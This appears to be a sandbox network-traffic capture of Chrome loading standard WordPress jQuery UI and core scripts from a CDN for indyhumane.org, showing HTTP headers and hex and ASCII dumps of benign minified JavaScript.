                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC400OUTGET /wp-includes/js/jquery/ui/menu.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC627INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 10199
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/ui/menu.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC742INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 4d 65 6e 75 20 31 2e 31 33 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75
                                                                                                                                                                                                                                                        Data Ascii: /*! * jQuery UI Menu 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */!function(e){"use strict";"function"==typeof define&&define.amd?define(["jqu
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 2e 75 6e 69 71 75 65 49 64 28 29 2e 61 74 74 72 28 7b 72 6f 6c 65 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 6f 6c 65 2c 74 61 62 49 6e 64 65 78 3a 30 7d 29 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 22 75 69 2d 6d 65 6e 75 22 2c 22 75 69 2d 77 69 64 67 65 74 20 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 22 29 2c 74 68 69 73 2e 5f 6f 6e 28 7b 22 6d 6f 75 73 65 64 6f 77 6e 20 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 49 74 65 6d 28 65 29 7d 2c 22 63 6c 69 63 6b 20 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 61 28 65 2e 74 61 72 67 65 74 29 2c 69 3d 61
                                                                                                                                                                                                                                                        Data Ascii: .uniqueId().attr({role:this.options.role,tabIndex:0}),this._addClass("ui-menu","ui-widget ui-widget-content"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault(),this._activateItem(e)},"click .ui-menu-item":function(e){var t=a(e.target),i=a
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6e 75 2d 69 74 65 6d 22 29 2c 69 3d 61 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 74 5b 30 5d 21 3d 3d 69 5b 30 5d 29 7c 7c 69 2e 69 73 28 22 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 22 29 7c 7c 28 74 68 69 73 2e 5f 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2e 73 69 62 6c 69 6e 67 73 28 29 2e 63 68 69 6c 64 72 65 6e 28 22 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 22 29 2c 6e 75 6c 6c 2c 22 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 22 29 2c 74 68 69 73 2e 66 6f 63 75 73 28 65 2c 69 29 29 7d 2c 5f 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 72 6f 6c 65 20 61 72 69
                                                                                                                                                                                                                                                        Data Ascii: nu-item"),i=a(e.currentTarget),t[0]!==i[0])||i.is(".ui-state-active")||(this._removeClass(i.siblings().children(".ui-state-active"),null,"ui-state-active"),this.focus(e,i))},_destroy:function(){var e=this.element.find(".ui-menu-item").removeAttr("role ari
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 61 72 43 6f 64 65 28 65 2e 6b 65 79 43 6f 64 65 29 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 66 69 6c 74 65 72 54 69 6d 65 72 29 2c 69 3d 3d 3d 74 3f 73 3d 21 30 3a 69 3d 74 2b 69 2c 74 3d 74 68 69 73 2e 5f 66 69 6c 74 65 72 4d 65 6e 75 49 74 65 6d 73 28 69 29 2c 28 74 3d 73 26 26 2d 31 21 3d 3d 74 2e 69 6e 64 65 78 28 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 28 29 29 3f 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 3a 74 29 2e 6c 65 6e 67 74 68 7c 7c 28 69 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 65 2e 6b 65 79 43 6f 64 65 29 2c 74 3d 74 68 69 73 2e 5f 66 69 6c 74 65 72 4d 65 6e 75 49 74 65 6d 73 28 69 29 29 2c 74 2e 6c 65 6e 67 74 68 3f 28 74 68 69
                                                                                                                                                                                                                                                        Data Ascii: arCode(e.keyCode),clearTimeout(this.filterTimer),i===t?s=!0:i=t+i,t=this._filterMenuItems(i),(t=s&&-1!==t.index(this.active.next())?this.active.nextAll(".ui-menu-item"):t).length||(i=String.fromCharCode(e.keyCode),t=this._filterMenuItems(i)),t.length?(thi
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 63 68 69 6c 64 72 65 6e 28 29 2e 6e 6f 74 28 22 2e 75 69 2d 6d 65 6e 75 22 29 2e 75 6e 69 71 75 65 49 64 28 29 2e 61 74 74 72 28 7b 74 61 62 49 6e 64 65 78 3a 2d 31 2c 72 6f 6c 65 3a 74 68 69 73 2e 5f 69 74 65 6d 52 6f 6c 65 28 29 7d 29 2c 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 69 2c 22 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 5f 61 64 64 43 6c 61 73 73 28 74 2c 22 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 2d 77 72 61 70 70 65 72 22 29 2c 65 2e 66 69 6c 74 65 72 28 22 2e 75 69 2d 73 74 61 74 65 2d 64 69 73 61 62 6c 65 64 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 2c 22 74 72 75 65 22 29 2c 74 68 69 73 2e 61 63 74 69 76 65 26 26 21 61 2e 63 6f 6e 74 61 69 6e 73 28 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2c 74 68 69 73 2e
                                                                                                                                                                                                                                                        Data Ascii: children().not(".ui-menu").uniqueId().attr({tabIndex:-1,role:this._itemRole()}),this._addClass(i,"ui-menu-item")._addClass(t,"ui-menu-item-wrapper"),e.filter(".ui-state-disabled").attr("aria-disabled","true"),this.active&&!a.contains(this.element[0],this.
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6c 6c 28 29 26 26 28 74 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 63 73 73 28 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 5b 30 5d 2c 22 62 6f 72 64 65 72 54 6f 70 57 69 64 74 68 22 29 29 7c 7c 30 2c 69 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 63 73 73 28 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 5b 30 5d 2c 22 70 61 64 64 69 6e 67 54 6f 70 22 29 29 7c 7c 30 2c 74 3d 65 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 74 2d 69 2c 69 3d 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 73 3d 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 2e 68 65 69 67 68 74 28 29 2c 65 3d 65 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 2c 74 3c 30 3f 74 68 69
                                                                                                                                                                                                                                                        Data Ascii: ll()&&(t=parseFloat(a.css(this.activeMenu[0],"borderTopWidth"))||0,i=parseFloat(a.css(this.activeMenu[0],"paddingTop"))||0,t=e.offset().top-this.activeMenu.offset().top-t-i,i=this.activeMenu.scrollTop(),s=this.activeMenu.height(),e=e.outerHeight(),t<0?thi
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 6d 65 6e 75 22 29 2e 68 69 64 65 28 29 2e 61 74 74 72 28 22 61 72 69 61 2d 68 69 64 64 65 6e 22 2c 22 74 72 75 65 22 29 2e 61 74 74 72 28 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 2c 22 66 61 6c 73 65 22 29 7d 2c 5f 63 6c 6f 73 65 4f 6e 44 6f 63 75 6d 65 6e 74 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 61 28 65 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 22 2e 75 69 2d 6d 65 6e 75 22 29 2e 6c 65 6e 67 74 68 7d 2c 5f 69 73 44 69 76 69 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 2f 5b 5e 5c 2d 5c 75 32 30 31 34 5c 75 32 30 31 33 5c 73 5d 2f 2e 74 65 73 74 28 65 2e 74 65 78 74 28 29 29 7d 2c 63 6f 6c 6c 61 70 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 61 63
                                                                                                                                                                                                                                                        Data Ascii: menu").hide().attr("aria-hidden","true").attr("aria-expanded","false")},_closeOnDocumentClick:function(e){return!a(e.target).closest(".ui-menu").length},_isDivider:function(e){return!/[^\-\u2014\u2013\s]/.test(e.text())},collapse:function(e){var t=this.ac
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1243INData Raw: 30 5d 2e 6f 66 66 73 65 74 48 65 69 67 68 74 2d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 6f 75 74 65 72 48 65 69 67 68 74 28 29 29 2c 74 68 69 73 2e 61 63 74 69 76 65 2e 6e 65 78 74 41 6c 6c 28 22 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 22 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 74 3d 61 28 74 68 69 73 29 29 2e 6f 66 66 73 65 74 28 29 2e 74 6f 70 2d 69 2d 73 3c 30 7d 29 2c 74 68 69 73 2e 66 6f 63 75 73 28 65 2c 74 29 29 3a 74 68 69 73 2e 66 6f 63 75 73 28 65 2c 74 68 69 73 2e 5f 6d 65 6e 75 49 74 65 6d 73 28 74 68 69 73 2e 61 63 74 69 76 65 4d 65 6e 75 29 5b 74 68 69 73 2e 61 63 74 69 76 65 3f 22 6c 61 73 74 22 3a 22 66 69 72 73 74 22 5d 28 29 29 29 3a 74 68 69 73 2e 6e 65 78 74 28 65 29 7d 2c 70 72 65 76 69 6f 75 73 50 61
                                                                                                                                                                                                                                                        Data Ascii: 0].offsetHeight-this.element.outerHeight()),this.active.nextAll(".ui-menu-item").each(function(){return(t=a(this)).offset().top-i-s<0}),this.focus(e,t)):this.focus(e,this._menuItems(this.activeMenu)[this.active?"last":"first"]())):this.next(e)},previousPa


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        17192.168.2.449769192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC414OUTGET /wp-includes/js/dist/dom-ready.min.js?ver=f77871ff7694fffea381 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 457
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/dom-ready.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 31 Jan 2024 12:59:56 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca HIT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC457INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 64 3a 28 74 2c 64 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 64 29 65 2e 6f 28 64 2c 6f 29 26 26 21 65 2e 6f 28 74 2c 6f 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 64 5b 6f 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 74 29 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var e={d:(t,d)=>{for(var o in d)e.o(d,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:d[o]})},o:(e,t)=>Object.prototype.hasOwnProperty.call(e,t)},t={};function d(e){"undefined"!=typeof docu


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        18192.168.2.449768192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC583OUTGET /wp-includes/js/dist/a11y.min.js?ver=3156534cc54473497e14 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 2358
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/dist/a11y.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Fri, 20 Sep 2024 01:55:35 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC747INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 6e 3a 74 3d 3e 7b 76 61 72 20 6e 3d 74 26 26 74 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 28 29 3d 3e 74 2e 64 65 66 61 75 6c 74 3a 28 29 3d 3e 74 3b 72 65 74 75 72 6e 20 65 2e 64 28 6e 2c 7b 61 3a 6e 7d 29 2c 6e 7d 2c 64 3a 28 74 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 29 65 2e 6f 28 6e 2c 6f 29 26 26 21 65 2e 6f 28 74 2c 6f 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 6f 5d 7d 29 7d 2c 6f 3a 28 65 2c 74 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70
                                                                                                                                                                                                                                                        Data Ascii: /*! This file is auto-generated */(()=>{"use strict";var e={n:t=>{var n=t&&t.__esModule?()=>t.default:()=>t;return e.d(n,{a:n}),n},d:(t,n)=>{for(var o in n)e.o(n,o)&&!e.o(t,o)&&Object.defineProperty(t,o,{enumerable:!0,get:n[o]})},o:(e,t)=>Object.prototyp
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC1369INData Raw: 3a 20 68 69 64 64 65 6e 3b 63 6c 69 70 3a 20 72 65 63 74 28 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 2d 77 65 62 6b 69 74 2d 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 62 6f 72 64 65 72 3a 20 30 3b 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 69 76 65 22 2c 65 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 72 65 6c 65 76 61 6e 74 22 2c 22 61 64 64 69 74 69 6f 6e 73 20 74 65 78 74 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 61 74 6f 6d 69 63 22 2c 22 74 72 75 65 22 29 3b 63 6f 6e 73 74
                                                                                                                                                                                                                                                        Data Ascii: : hidden;clip: rect(1px, 1px, 1px, 1px);-webkit-clip-path: inset(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"),t.setAttribute("aria-live",e),t.setAttribute("aria-relevant","additions text"),t.setAttribute("aria-atomic","true");const
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC242INData Raw: 74 28 35 30 25 29 3b 63 6c 69 70 2d 70 61 74 68 3a 20 69 6e 73 65 74 28 35 30 25 29 3b 62 6f 72 64 65 72 3a 20 30 3b 77 6f 72 64 2d 77 72 61 70 3a 20 6e 6f 72 6d 61 6c 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 29 2c 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 68 69 64 64 65 6e 22 2c 22 68 69 64 64 65 6e 22 29 3b 63 6f 6e 73 74 7b 62 6f 64 79 3a 74 7d 3d 64 6f 63 75 6d 65 6e 74 3b 74 26 26 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 28 29 2c 6e 75 6c 6c 3d 3d 3d 74 26 26 69 28 22 61 73 73 65 72 74 69 76 65 22 29 2c 6e 75 6c 6c 3d 3d 3d 6e 26 26 69 28 22 70 6f 6c 69 74 65 22 29 7d 6f 28 29 28 70 29 2c 28 77 69 6e 64 6f 77 2e 77 70 3d 77 69 6e 64 6f 77 2e 77 70 7c 7c 7b 7d 29 2e 61 31 31 79 3d 74 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: t(50%);clip-path: inset(50%);border: 0;word-wrap: normal !important;"),e.setAttribute("hidden","hidden");const{body:t}=document;t&&t.appendChild(e)}(),null===t&&i("assertive"),null===n&&i("polite")}o()(p),(window.wp=window.wp||{}).a11y=t})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        19192.168.2.449772192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC582OUTGET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.3 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:10 UTC635INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:10 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 8536
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-includes/js/jquery/ui/autocomplete.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Thu, 27 Jun 2024 12:55:22 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
